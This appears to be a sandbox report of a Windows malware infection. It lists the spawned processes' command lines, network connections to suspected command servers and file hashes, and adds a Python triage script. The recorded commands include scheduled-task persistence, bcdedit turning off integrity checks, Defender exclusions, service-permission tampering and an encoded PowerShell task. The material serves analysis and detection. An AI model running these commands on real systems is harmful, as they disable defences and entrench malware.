"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2232 --field-trial-handle=1448,i,4869214669569361197,983088060033817693,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe

"C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --extension-process --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=3348 --field-trial-handle=1448,i,4869214669569361197,983088060033817693,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=3084 --field-trial-handle=1448,i,4869214669569361197,983088060033817693,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=angle --use-angle=swiftshader-webgl --mojo-platform-channel-handle=1468 --field-trial-handle=1448,i,4869214669569361197,983088060033817693,131072 /prefetch:2

C:\Windows\SysWOW64\schtasks.exe

schtasks /create /f /RU "Admin" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 HR" /sc HOURLY /rl HIGHEST

C:\Windows\SysWOW64\schtasks.exe

schtasks /create /f /RU "Admin" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 LG" /sc ONLOGON /rl HIGHEST

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "gBVIaQAaO"

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "-1905151612-1294555895568799192-348904360755802282-12423083741589601242-74749301"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "beMXFFiCiqlBKkvOrW" /SC once /ST 09:02:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\MJtmiEaOySOnsMbTj\ProJgWWzBHWXbAm\XOmGTSn.exe\" Fm /fBsite_idZpU 525403 /S" /V1 /F

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 708 -s 580

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4148 --field-trial-handle=1448,i,4869214669569361197,983088060033817693,131072 /prefetch:8

C:\Users\Admin\AppData\Local\Temp\heidi_K9P2oRtBlnq\KNhryoa8p5U1x6qRHgW5.exe

"C:\Users\Admin\AppData\Local\Temp\heidi_K9P2oRtBlnq\KNhryoa8p5U1x6qRHgW5.exe"

C:\Program Files\Internet Explorer\iexplore.exe

"C:\Program Files\Internet Explorer\iexplore.exe" https://www.youtube.com/

C:\Program Files\Internet Explorer\iexplore.exe

"C:\Program Files\Internet Explorer\iexplore.exe" https://www.linkedin.com/login

C:\Program Files\Internet Explorer\iexplore.exe

"C:\Program Files\Internet Explorer\iexplore.exe" https://www.facebook.com/video

C:\Program Files\Internet Explorer\iexplore.exe

"C:\Program Files\Internet Explorer\iexplore.exe" https://accounts.google.com/

C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE

"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2464 CREDAT:275457 /prefetch:2

C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE

"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2004 CREDAT:275457 /prefetch:2

C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE

"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:936 CREDAT:275457 /prefetch:2

C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE

"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1396 CREDAT:275457 /prefetch:2

C:\Users\Admin\AppData\Local\Temp\2BF.exe

C:\Users\Admin\AppData\Local\Temp\2BF.exe

C:\Users\Admin\AppData\Local\Temp\2BF.exe

C:\Users\Admin\AppData\Local\Temp\2BF.exe

C:\Windows\system32\regsvr32.exe

regsvr32 /s C:\Users\Admin\AppData\Local\Temp\1028.dll

C:\Windows\SysWOW64\regsvr32.exe

/s C:\Users\Admin\AppData\Local\Temp\1028.dll

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -create {71A3C7FC-F751-4982-AEC1-E958357E6813} -d "Windows Fast Mode" -application OSLOADER

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} device partition=C:

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} osdevice partition=C:

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} systemroot \Windows

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} path \Windows\system32\osloader.exe

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} kernel ntkrnlmp.exe

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} recoveryenabled 0

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} nx OptIn

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} nointegritychecks 1

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} inherit {bootloadersettings}

C:\Windows\SysWOW64\schtasks.exe

schtasks /create /f /RU "Admin" /tr "C:\ProgramData\MSIUpdaterV131\MSIUpdaterV131.exe" /tn "MSIUpdaterV131 HR" /sc HOURLY /rl HIGHEST

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -displayorder {71A3C7FC-F751-4982-AEC1-E958357E6813} -addlast

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -timeout 0

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -default {71A3C7FC-F751-4982-AEC1-E958357E6813}

C:\Windows\system32\bcdedit.exe

C:\Windows\Sysnative\bcdedit.exe /v

C:\Windows\SysWOW64\schtasks.exe

schtasks /create /f /RU "Admin" /tr "C:\ProgramData\MSIUpdaterV131\MSIUpdaterV131.exe" /tn "MSIUpdaterV131 LG" /sc ONLOGON /rl HIGHEST

C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe

C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe

C:\Users\Admin\AppData\Local\Temp\heidi_K9P2oRtBlnq\svXurge7NCIUBVHrYG75.exe

"C:\Users\Admin\AppData\Local\Temp\heidi_K9P2oRtBlnq\svXurge7NCIUBVHrYG75.exe"

C:\Users\Admin\AppData\Local\Temp\6C6B.exe

C:\Users\Admin\AppData\Local\Temp\6C6B.exe

C:\Windows\system32\schtasks.exe

schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F

C:\Users\Admin\AppData\Local\Temp\84BD.exe

C:\Users\Admin\AppData\Local\Temp\84BD.exe

C:\Users\Admin\AppData\Local\Temp\A6CE.exe

C:\Users\Admin\AppData\Local\Temp\A6CE.exe

C:\Users\Admin\AppData\Local\Temp\heidi_K9P2oRtBlnq\caYoou6AkD688ohBorlb.exe

"C:\Users\Admin\AppData\Local\Temp\heidi_K9P2oRtBlnq\caYoou6AkD688ohBorlb.exe"

C:\Windows\windefender.exe

"C:\Windows\windefender.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4076 -s 128

C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe

"C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe"

C:\Windows\SysWOW64\cmd.exe

cmd.exe /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)

C:\Windows\SysWOW64\sc.exe

sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)

C:\Windows\windefender.exe

C:\Windows\windefender.exe

C:\Users\Admin\AppData\Local\Temp\InstallSetup4.exe

"C:\Users\Admin\AppData\Local\Temp\InstallSetup4.exe"

C:\Users\Admin\AppData\Local\Temp\BroomSetup.exe

C:\Users\Admin\AppData\Local\Temp\BroomSetup.exe

C:\Users\Admin\AppData\Local\Temp\CF74.exe

C:\Users\Admin\AppData\Local\Temp\CF74.exe

C:\Users\Admin\AppData\Local\Temp\FourthX.exe

"C:\Users\Admin\AppData\Local\Temp\FourthX.exe"

C:\Users\Admin\AppData\Local\Temp\nsuDA1C.tmp

C:\Users\Admin\AppData\Local\Temp\nsuDA1C.tmp

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Roaming\Temp\Task.bat" "

C:\Windows\SysWOW64\chcp.com

chcp 1251

C:\Windows\SysWOW64\schtasks.exe

schtasks /create /tn "MalayamaraUpdate" /tr "'C:\Users\Admin\AppData\Local\Temp\Updater.exe'" /sc minute /mo 30 /F

C:\Users\Admin\AppData\Local\Temp\EF74.exe

C:\Users\Admin\AppData\Local\Temp\EF74.exe

C:\Users\Admin\AppData\Local\Temp\is-R37QN.tmp\EF74.tmp

"C:\Users\Admin\AppData\Local\Temp\is-R37QN.tmp\EF74.tmp" /SL5="$303CE,4061719,54272,C:\Users\Admin\AppData\Local\Temp\EF74.exe"

C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe

"C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe"

C:\Windows\system32\taskeng.exe

taskeng.exe {8903C1B5-A8FA-445B-8D40-1E14AB9CCD71} S-1-5-18:NT AUTHORITY\System:Service:

C:\Users\Admin\AppData\Local\Temp\8.exe

C:\Users\Admin\AppData\Local\Temp\8.exe

C:\Users\Admin\AppData\Local\Temp\is-MIBAB.tmp\8.tmp

"C:\Users\Admin\AppData\Local\Temp\is-MIBAB.tmp\8.tmp" /SL5="$303CA,4314505,54272,C:\Users\Admin\AppData\Local\Temp\8.exe"

C:\Users\Admin\AppData\Local\Temp\305.exe

C:\Users\Admin\AppData\Local\Temp\305.exe

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force

C:\Users\Admin\AppData\Local\Temp\MJtmiEaOySOnsMbTj\ProJgWWzBHWXbAm\XOmGTSn.exe

C:\Users\Admin\AppData\Local\Temp\MJtmiEaOySOnsMbTj\ProJgWWzBHWXbAm\XOmGTSn.exe Fm /fBsite_idZpU 525403 /S
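
The command lines above are what a responder acts on, so the following is an added triage helper written for this page (it is not part of the sandbox tooling, nor code from the malware it records). It decodes the UTF-16LE base64 payload that the "gBVIaQAaO" task hands to powershell.exe, expands the SDDL that sc sdset applied to the fake "WinDefender" service, and flags the Defender policy writes, the Add-MpPreference exclusions, the boot entry created with nointegritychecks 1, and the csrss.exe copy living outside the system directories. The entries in CMDLINES are copied from the Processes section; the rule names, the prefix list for -EncodedCommand, and the list of directories where a csrss.exe is legitimate are assumptions made here.

```python
"""Added triage helper for the command lines listed in this report.  Written for
this page, not part of the sandbox or of the malware it describes.  The entries in
CMDLINES are copied from the Processes section above; the rule names and the list
of directories where a csrss.exe is legitimate are assumptions made here."""
import base64
import re

# Constructed subset of the report's command lines, one per behaviour of interest.
CMDLINES = [
    'schtasks /CREATE /TN "gBVIaQAaO" /SC once /ST 06:57:15 /F /RU "Admin" /TR '
    '"powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="',
    'REG ADD "HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows Defender\\Exclusions\\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64',
    'REG ADD "HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows Defender\\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64',
    'netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\\Windows\\rss\\csrss.exe" enable=yes',
    'schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\\Windows\\rss\\csrss.exe" /TN csrss /F',
    'C:\\Windows\\system32\\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} nointegritychecks 1',
    'sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)',
    "C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force",
]

# powershell.exe accepts any unambiguous prefix of -EncodedCommand, plus -ec (assumed list).
_ENC_FLAGS = {"-" + "encodedcommand"[:n] for n in range(1, 15)} | {"-ec"}


def decode_encoded_command(cmdline):
    """Return the plaintext behind a -EncodedCommand argument, or None.

    The payload is base64 over UTF-16LE, so a plain ASCII decode would show
    every other byte as NUL."""
    toks = cmdline.split()
    for i, tok in enumerate(toks[:-1]):
        if tok.lower() in _ENC_FLAGS:
            return base64.b64decode(toks[i + 1].strip("\"'")).decode("utf-16-le")
    return None


# Two-letter SDDL access rights as they apply to service objects.
SERVICE_RIGHTS = {
    "CC": "SERVICE_QUERY_CONFIG", "DC": "SERVICE_CHANGE_CONFIG", "LC": "SERVICE_QUERY_STATUS",
    "SW": "SERVICE_ENUMERATE_DEPENDENTS", "RP": "SERVICE_START", "WP": "SERVICE_STOP",
    "DT": "SERVICE_PAUSE_CONTINUE", "LO": "SERVICE_INTERROGATE", "CR": "SERVICE_USER_DEFINED_CONTROL",
    "SD": "DELETE", "RC": "READ_CONTROL", "WD": "WRITE_DAC", "WO": "WRITE_OWNER",
    "GA": "GENERIC_ALL", "GR": "GENERIC_READ", "GW": "GENERIC_WRITE", "GX": "GENERIC_EXECUTE",
}
ACE_TYPES = {"A": "allow", "D": "deny", "AU": "audit"}


def parse_service_sddl(sddl):
    """Expand the DACL of a service security descriptor into (type, trustee, rights)."""
    dacl = re.search(r"D:[A-Z]*((?:\([^)]*\))+)", sddl)
    aces = []
    for ace in re.findall(r"\(([^)]*)\)", dacl.group(1)):
        ace_type, _flags, rights, _obj, _iobj, trustee = ace.split(";")[:6]
        if rights.lower().startswith("0x"):          # raw access mask, left as-is
            names = [rights]
        else:
            names = [SERVICE_RIGHTS.get(rights[i:i + 2], rights[i:i + 2])
                     for i in range(0, len(rights), 2)]
        aces.append((ACE_TYPES.get(ace_type, ace_type), trustee, names))
    return aces


# Directories where csrss/svchost/lsass/winlogon are expected (assumption).
LEGIT_SYSTEM_DIRS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\")


def triage(cmdlines):
    """Return (rule, detail) findings for the defence-evasion steps seen in this report."""
    findings = []
    for c in cmdlines:
        low = c.lower()
        decoded = decode_encoded_command(c)
        if decoded is not None:
            findings.append(("encoded_powershell", decoded))
        if "reg add" in low and "policies\\microsoft\\windows defender" in low:
            findings.append(("defender_policy_tamper", c))
        if "add-mppreference" in low and "-exclusion" in low:
            findings.append(("defender_exclusion_added", c))
        if "bcdedit" in low and "nointegritychecks 1" in low:
            findings.append(("driver_signature_enforcement_off", c))
        if low.startswith("sc sdset"):
            for kind, who, rights in parse_service_sddl(c.split(None, 3)[3]):
                if kind == "deny" and "SERVICE_STOP" in rights:
                    findings.append(("service_stop_denied", "%s: %s" % (who, ",".join(rights))))
        # A system binary name referenced from outside the system directories.
        for m in re.finditer(r"[a-z]:\\[^\s\"']+\\(?:csrss|svchost|lsass|winlogon)\.exe", low):
            if not m.group(0).startswith(LEGIT_SYSTEM_DIRS):
                findings.append(("system_binary_masquerade", m.group(0)))
    return findings


if __name__ == "__main__":
    for rule, detail in triage(CMDLINES):
        print("%-34s %s" % (rule, detail))
```

Run as a script it prints one finding per line. Decoding the task payload gives start-process -WindowStyle Hidden gpupdate.exe /force, a Group Policy refresh, which is how the REG ADD writes under HKLM\SOFTWARE\Policies\Microsoft\Windows Defender (made for both registry views with /reg:32 and /reg:64) are brought into effect without a reboot. The third ACE of the service descriptor, (D;;WPDT;;;BA), denies SERVICE_STOP and SERVICE_PAUSE_CONTINUE to the local Administrators group, so sc stop WinDefender from an elevated prompt is refused; the allow ACE for BA still carries WRITE_DAC, so the descriptor can be reset with another sc sdset, and the SYSTEM ACE keeps stop rights, so the service can also be stopped from a SYSTEM context.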

Network

Country Destination Domain Proto
DE 77.105.147.130:80 77.105.147.130 tcp
US 8.8.8.8:53 api.myip.com udp
US 104.26.8.59:443 api.myip.com tcp
US 8.8.8.8:53 ipinfo.io udp
US 34.117.186.192:443 ipinfo.io tcp
US 34.117.186.192:443 ipinfo.io tcp
US 8.8.8.8:53 cczhk.com udp
US 8.8.8.8:53 medfioytrkdkcodlskeej.net udp
US 8.8.8.8:53 vk.com udp
US 8.8.8.8:53 cleued.com udp
US 8.8.8.8:53 def.bestsup.su udp
US 8.8.8.8:53 294down-river.sbs udp
US 8.8.8.8:53 acenitive.shop udp
US 8.8.8.8:53 monoblocked.com udp
RU 147.45.47.101:80 147.45.47.101 tcp
DE 185.172.128.127:80 185.172.128.127 tcp
RU 91.215.85.209:80 medfioytrkdkcodlskeej.net tcp
RU 87.240.132.78:80 vk.com tcp
RU 87.240.132.78:80 vk.com tcp
US 172.67.215.205:80 acenitive.shop tcp
US 172.67.215.205:80 acenitive.shop tcp
US 104.21.29.103:80 def.bestsup.su tcp
US 172.67.180.151:80 294down-river.sbs tcp
US 172.67.154.10:80 cleued.com tcp
RU 45.130.41.108:80 monoblocked.com tcp
AR 190.224.203.37:80 cczhk.com tcp
US 172.67.180.151:443 294down-river.sbs tcp
US 172.67.215.205:80 acenitive.shop tcp
US 172.67.154.10:80 cleued.com tcp
US 172.67.215.205:80 acenitive.shop tcp
RU 87.240.132.78:80 vk.com tcp
RU 87.240.132.78:80 vk.com tcp
RU 91.215.85.209:80 medfioytrkdkcodlskeej.net tcp
RU 45.130.41.108:80 monoblocked.com tcp
US 172.67.154.10:80 cleued.com tcp
US 172.67.215.205:80 acenitive.shop tcp
US 172.67.215.205:80 acenitive.shop tcp
US 172.67.154.10:80 cleued.com tcp
US 172.67.215.205:80 acenitive.shop tcp
US 172.67.215.205:80 acenitive.shop tcp
US 172.67.154.10:443 cleued.com tcp
US 172.67.215.205:443 acenitive.shop tcp
US 172.67.215.205:443 acenitive.shop tcp
RU 87.240.132.78:80 vk.com tcp
RU 87.240.132.78:80 vk.com tcp
RU 91.215.85.209:80 medfioytrkdkcodlskeej.net tcp
RU 45.130.41.108:80 monoblocked.com tcp
AR 190.224.203.37:80 cczhk.com tcp
RU 87.240.132.78:80 vk.com tcp
RU 87.240.132.78:80 vk.com tcp
US 8.8.8.8:53 pergor.com udp
RU 91.215.85.209:80 medfioytrkdkcodlskeej.net tcp
RU 45.130.41.108:80 monoblocked.com tcp
RU 45.130.41.108:443 monoblocked.com tcp
US 104.21.32.227:443 pergor.com tcp
RU 91.215.85.209:443 medfioytrkdkcodlskeej.net tcp
RU 87.240.132.78:80 vk.com tcp
RU 87.240.132.78:80 vk.com tcp
RU 87.240.132.78:80 vk.com tcp
RU 87.240.132.78:80 vk.com tcp
US 8.8.8.8:53 apps.identrust.com udp
GB 96.17.179.184:80 apps.identrust.com tcp
RU 87.240.132.78:80 vk.com tcp
RU 87.240.132.78:80 vk.com tcp
RU 87.240.132.78:80 vk.com tcp
RU 87.240.132.78:80 vk.com tcp
RU 87.240.132.78:80 vk.com tcp
RU 87.240.132.78:80 vk.com tcp
RU 87.240.132.78:80 vk.com tcp
RU 87.240.132.78:80 vk.com tcp
RU 87.240.132.78:80 vk.com tcp
US 8.8.8.8:53 632432.site udp
RU 87.240.132.78:80 vk.com tcp
NL 194.104.136.64:443 632432.site tcp
RU 87.240.132.78:80 vk.com tcp
RU 87.240.132.78:80 vk.com tcp
RU 87.240.132.78:80 vk.com tcp
RU 87.240.132.78:80 vk.com tcp
RU 87.240.132.78:80 vk.com tcp
RU 87.240.132.78:80 vk.com tcp
RU 87.240.132.78:80 vk.com tcp
RU 87.240.132.78:80 vk.com tcp
RU 87.240.132.78:80 vk.com tcp
RU 87.240.132.78:80 vk.com tcp
RU 87.240.132.78:80 vk.com tcp
RU 87.240.132.78:80 vk.com tcp
RU 87.240.132.78:80 vk.com tcp
RU 87.240.132.78:80 vk.com tcp
RU 87.240.132.78:80 vk.com tcp
RU 87.240.132.78:80 vk.com tcp
RU 87.240.132.78:80 vk.com tcp
RU 87.240.132.78:80 vk.com tcp
RU 87.240.132.78:443 vk.com tcp
RU 87.240.132.78:443 vk.com tcp
RU 87.240.132.78:443 vk.com tcp
RU 87.240.132.78:443 vk.com tcp
RU 87.240.132.78:443 vk.com tcp
RU 87.240.132.78:443 vk.com tcp
RU 87.240.132.78:443 vk.com tcp
RU 87.240.132.78:443 vk.com tcp
RU 87.240.132.78:443 vk.com tcp
RU 87.240.132.78:443 vk.com tcp
DE 77.105.147.130:80 77.105.147.130 tcp
US 8.8.8.8:53 iplis.ru udp
US 104.21.63.150:443 iplis.ru tcp
US 8.8.8.8:53 iplogger.org udp
DE 185.172.128.24:80 185.172.128.24 tcp
DE 77.105.147.130:80 77.105.147.130 tcp
US 172.67.132.113:443 iplogger.org tcp
US 8.8.8.8:53 api.myip.com udp
US 104.26.8.59:443 api.myip.com tcp
US 8.8.8.8:53 ipinfo.io udp
US 34.117.186.192:443 ipinfo.io tcp
US 34.117.186.192:443 ipinfo.io tcp
NL 195.20.16.46:80 195.20.16.46 tcp
NL 195.20.16.46:80 195.20.16.46 tcp
US 8.8.8.8:53 iplis.ru udp
US 172.67.147.32:443 iplis.ru tcp
US 172.67.132.113:443 iplogger.org tcp
US 8.8.8.8:53 068aa7a0-365c-4e37-892e-354720613d6a.uuid.theupdatetime.org udp
US 8.8.8.8:53 msdl.microsoft.com udp
US 204.79.197.219:443 msdl.microsoft.com tcp
US 8.8.8.8:53 clients2.google.com udp
GB 142.250.200.14:443 clients2.google.com tcp
US 8.8.8.8:53 vsblobprodscussu5shard30.blob.core.windows.net udp
US 20.150.79.68:443 vsblobprodscussu5shard30.blob.core.windows.net tcp
RU 193.233.132.62:50500 tcp
US 8.8.8.8:53 ipinfo.io udp
US 34.117.186.192:443 ipinfo.io tcp
US 34.117.186.192:443 ipinfo.io tcp
US 8.8.8.8:53 api.tris.com udp
US 104.21.60.34:443 api.tris.com tcp
US 8.8.8.8:53 db-ip.com udp
US 172.67.75.166:443 db-ip.com tcp
N/A 224.0.0.251:5353 udp
RU 185.215.113.46:80 185.215.113.46 tcp
US 8.8.8.8:53 selebration17io.io udp
RU 91.215.85.120:80 selebration17io.io tcp
US 8.8.8.8:53 www.facebook.com udp
US 8.8.8.8:53 www.linkedin.com udp
US 8.8.8.8:53 accounts.google.com udp
US 8.8.8.8:53 www.youtube.com udp
NL 173.194.79.84:443 accounts.google.com tcp
NL 173.194.79.84:443 accounts.google.com tcp
FR 157.240.195.35:443 www.facebook.com tcp
US 13.107.42.14:443 www.linkedin.com tcp
US 13.107.42.14:443 www.linkedin.com tcp
FR 157.240.195.35:443 www.facebook.com tcp
GB 142.250.187.238:443 www.youtube.com tcp
GB 142.250.187.238:443 www.youtube.com tcp
US 8.8.8.8:53 static.licdn.com udp
FR 152.199.21.118:443 static.licdn.com tcp
FR 152.199.21.118:443 static.licdn.com tcp
FR 152.199.21.118:443 static.licdn.com tcp
FR 152.199.21.118:443 static.licdn.com tcp
FR 152.199.21.118:443 static.licdn.com tcp
FR 152.199.21.118:443 static.licdn.com tcp
DE 178.254.31.125:443 tcp
US 8.8.8.8:53 platform.linkedin.com udp
US 13.107.246.64:443 platform.linkedin.com tcp
US 13.107.246.64:443 platform.linkedin.com tcp
CA 198.245.60.91:443 tcp
LV 195.123.209.91:5092 tcp
US 8.8.8.8:53 vsblobprodscussu5shard20.blob.core.windows.net udp
US 20.150.79.68:443 vsblobprodscussu5shard20.blob.core.windows.net tcp
US 204.79.197.200:443 ieonline.microsoft.com tcp
US 204.79.197.200:443 ieonline.microsoft.com tcp
US 8.8.8.8:53 www.google.com udp
GB 172.217.16.228:443 www.google.com tcp
GB 172.217.16.228:443 www.google.com tcp
US 8.8.8.8:53 accounts.youtube.com udp
GB 172.217.16.238:443 accounts.youtube.com tcp
GB 172.217.16.238:443 accounts.youtube.com tcp
FR 157.240.195.35:443 www.facebook.com tcp
DE 165.227.174.150:9001 tcp
US 128.31.0.39:9101 tcp
US 8.8.8.8:53 m.facebook.com udp
GB 163.70.147.35:443 m.facebook.com tcp
GB 163.70.147.35:443 m.facebook.com tcp
GB 163.70.147.35:443 m.facebook.com tcp
US 8.8.8.8:53 static.xx.fbcdn.net udp
GB 163.70.147.23:443 static.xx.fbcdn.net tcp
GB 163.70.147.23:443 static.xx.fbcdn.net tcp
GB 163.70.147.23:443 static.xx.fbcdn.net tcp
GB 163.70.147.23:443 static.xx.fbcdn.net tcp
GB 163.70.147.23:443 static.xx.fbcdn.net tcp
GB 163.70.147.23:443 static.xx.fbcdn.net tcp
US 8.8.8.8:53 facebook.com udp
GB 163.70.147.35:443 facebook.com tcp
GB 163.70.147.35:443 facebook.com tcp
GB 163.70.147.23:443 static.xx.fbcdn.net tcp
GB 163.70.147.23:443 static.xx.fbcdn.net tcp
GB 163.70.147.23:443 static.xx.fbcdn.net tcp
GB 163.70.147.35:443 facebook.com tcp
GB 163.70.147.23:443 static.xx.fbcdn.net tcp
GB 163.70.147.23:443 static.xx.fbcdn.net tcp
GB 163.70.147.23:443 static.xx.fbcdn.net tcp
GB 163.70.147.23:443 static.xx.fbcdn.net tcp
GB 163.70.147.23:443 static.xx.fbcdn.net tcp
US 8.8.8.8:53 fbcdn.net udp
GB 163.70.147.35:443 fbcdn.net tcp
GB 163.70.147.35:443 fbcdn.net tcp
US 8.8.8.8:53 stun2.l.google.com udp
US 8.8.8.8:53 server7.theupdatetime.org udp
US 8.8.8.8:53 cdn.discordapp.com udp
NL 192.42.116.17:443 tcp
US 8.8.8.8:53 crls.pki.goog udp
US 8.8.8.8:53 crls.pki.goog udp
US 8.8.8.8:53 crls.pki.goog udp
BG 185.82.216.108:443 server7.theupdatetime.org tcp
US 8.8.8.8:53 crls.pki.goog udp

Files

SHA256 57cc3426fb9d1dfff31b3074f85f1d7b1625a4e29af0590ad05ef0bbdfbd31ed
SHA512 3b319d8cea8b2b0d9ddb8561afce61f4c255fc25a5613ba77b9462cc27d556b5fa6ddee5409461ca51fefbb28021f58c5b9dfe471c1343a8be4e1ee053aeeb15

memory/708-966-0x00000000066D0000-0x00000000069AC000-memory.dmp

C:\Users\Admin\Documents\GuardFox\oO_q1f2AwSXGxmbqM3esoqyX.exe

MD5 50f83c5a0e15f5030b758024da774685
SHA1 715427ee4c537bc16c770bbc1b8ba92368de7d28
SHA256 841a3640c2c8a68809763bfa074330e3e991bd0fb803e1e18b9f80128bdc3519
SHA512 213044e261aad0a5c01617a30b5377499694ac7519119a1942c5c6835e11fa3a3a2a87c0b3bb0343cb289762e51609d10fb3a77ff83028045b61233414dc827e

memory/452-995-0x0000000004A90000-0x0000000004E88000-memory.dmp

memory/1940-996-0x0000000000400000-0x0000000003118000-memory.dmp

memory/1940-997-0x0000000004B20000-0x0000000004F18000-memory.dmp

memory/1744-1000-0x000000006E480000-0x000000006EA2B000-memory.dmp

